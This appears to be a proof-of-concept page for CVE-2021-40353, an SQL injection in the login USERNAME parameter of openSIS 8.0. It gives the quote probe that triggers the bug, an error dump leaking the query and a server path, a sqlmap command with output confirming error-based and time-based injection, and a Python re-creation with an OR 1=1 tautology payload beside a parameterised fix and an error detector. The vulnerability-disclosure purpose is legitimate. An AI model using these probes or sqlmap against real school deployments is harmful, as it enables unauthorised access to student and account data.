
CVE-2021-40353 PoC — Open Solutions For Education openSIS SQL injection vulnerability

Source
Associated Vulnerability
Title: Open Solutions For Education openSIS SQL injection vulnerability (CVE-2021-40353)
Description:A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the index.php USERNAME parameter. NOTE: this issue may exist because of an incomplete fix for CVE-2020-6637.
Description
CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability
Readme
# CVE-2021-40353
CVE-2021-40353 openSIS 8.0 SQL Injection Vulnerability https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the USERNAME parameter.


Vulnerable PHP Page:

index.php - USERNAME parameter

Vulnerable Payload

' (single quote) - breaks the string literal and produces an error page that discloses the failing SQL statement, the server-side file path and the MariaDB error text
" (double quote) - is accepted as part of the literal and does not produce the error

Error

Date: 08/31/2021 03:16:22
Failure Notice: DB Execute Failed
SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'')
Traceback: C:\xampp\htdocs\opensis\index.php at 502
Additional Information: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''user1'')' at line 1

openSIS has encountered an error that could have resulted from any of the following:

    Invalid data input
    Database SQL error
    Program error

Please take this screen shot and send it to your openSIS representative for debugging and resolution.

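The error dump above shows the exact query shape the login path builds: the submitted USERNAME is spliced unescaped into `UPPER('...')`. The following is an added example, not code from the PoC or from openSIS, that re-creates that query shape locally so the single-quote versus double-quote behaviour can be observed offline. It uses in-memory SQLite as a stand-in for MySQL/MariaDB (an assumption made only so it runs without a database server; the error text differs from MariaDB's), a constructed two-row `login_authentication` table, and a parameterised version of the same UPDATE beside the vulnerable one. It also includes a small classifier for the openSIS error page, keyed on the "DB Execute Failed" and "You have an error in your SQL syntax" strings visible in the dump, which is the check a tester would apply to the response of the `'` probe.

```python
import sqlite3

# Query shape copied from the openSIS error dump. The USERNAME value is
# interpolated as raw text, which is the injection point (vulnerable form).
VULN_SQL = ("UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 "
            "WHERE UPPER(USERNAME)=UPPER('{username}')")

# Same statement with a bind parameter: the driver sends the value out of
# band, so quotes and comment markers in it are never parsed as SQL.
SAFE_SQL = ("UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 "
            "WHERE UPPER(USERNAME)=UPPER(?)")

# Strings the openSIS error page contains, per the dump on this page.
ERROR_MARKERS = ("DB Execute Failed", "You have an error in your SQL syntax")


def fresh_db():
    """Constructed sample data (not from openSIS): two accounts, no failures."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login_authentication "
               "(USERNAME TEXT, FAILED_LOGIN INTEGER)")
    db.executemany("INSERT INTO login_authentication VALUES (?, ?)",
                   [("user1", 0), ("admin", 0)])
    return db


def failed_logins(db):
    """Return {username: FAILED_LOGIN} so the effect of an update is visible."""
    return dict(db.execute(
        "SELECT USERNAME, FAILED_LOGIN FROM login_authentication"))


def vulnerable_update(db, username):
    """String-built UPDATE. Returns ('ok', rows_touched) or ('error', msg)."""
    try:
        cur = db.execute(VULN_SQL.format(username=username))
        return ("ok", cur.rowcount)
    except sqlite3.Error as exc:
        return ("error", str(exc))


def safe_update(db, username):
    """Parameterised UPDATE: the input is data, never SQL."""
    cur = db.execute(SAFE_SQL, (username,))
    return ("ok", cur.rowcount)


def looks_like_sql_error(body):
    """True if an HTTP response body carries the openSIS DB error page."""
    return any(marker in body for marker in ERROR_MARKERS)


if __name__ == "__main__":
    # The PoC's own two probes: "'" breaks the literal, '"' does not.
    print(vulnerable_update(fresh_db(), "user1'"))   # ('error', ...)
    print(vulnerable_update(fresh_db(), 'user1"'))   # ('ok', 0)

    # Illustrative tautology (assumed payload, not from the PoC): closing the
    # literal and commenting out the rest makes the UPDATE hit every row.
    db = fresh_db()
    print(vulnerable_update(db, "') OR 1=1 -- "), failed_logins(db))

    # The same input against the parameterised statement matches nothing.
    db = fresh_db()
    print(safe_update(db, "') OR 1=1 -- "), failed_logins(db))
```

The classifier is deliberately conservative: both marker strings are taken verbatim from the dump, so a response that matches is the same error page the PoC author saw, not a generic 500. Against a real target the `'` probe is the only request needed to confirm the bug; the tautology is included here only to show what the string-built statement permits.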



sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST parameter 'USERNAME' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[09:38:19] [INFO] testing 'MySQL inline queries'
[09:38:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:38:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:38:23] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:38:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:38:46] [INFO] POST parameter 'USERNAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable




Discovered by Brian Lowe, August 2021
File Snapshot

[4.0K] /data/pocs/696cb287b634c6e9bea2aea00b187f7cf84d9b86 └── [2.1K] README.md 0 directories, 1 file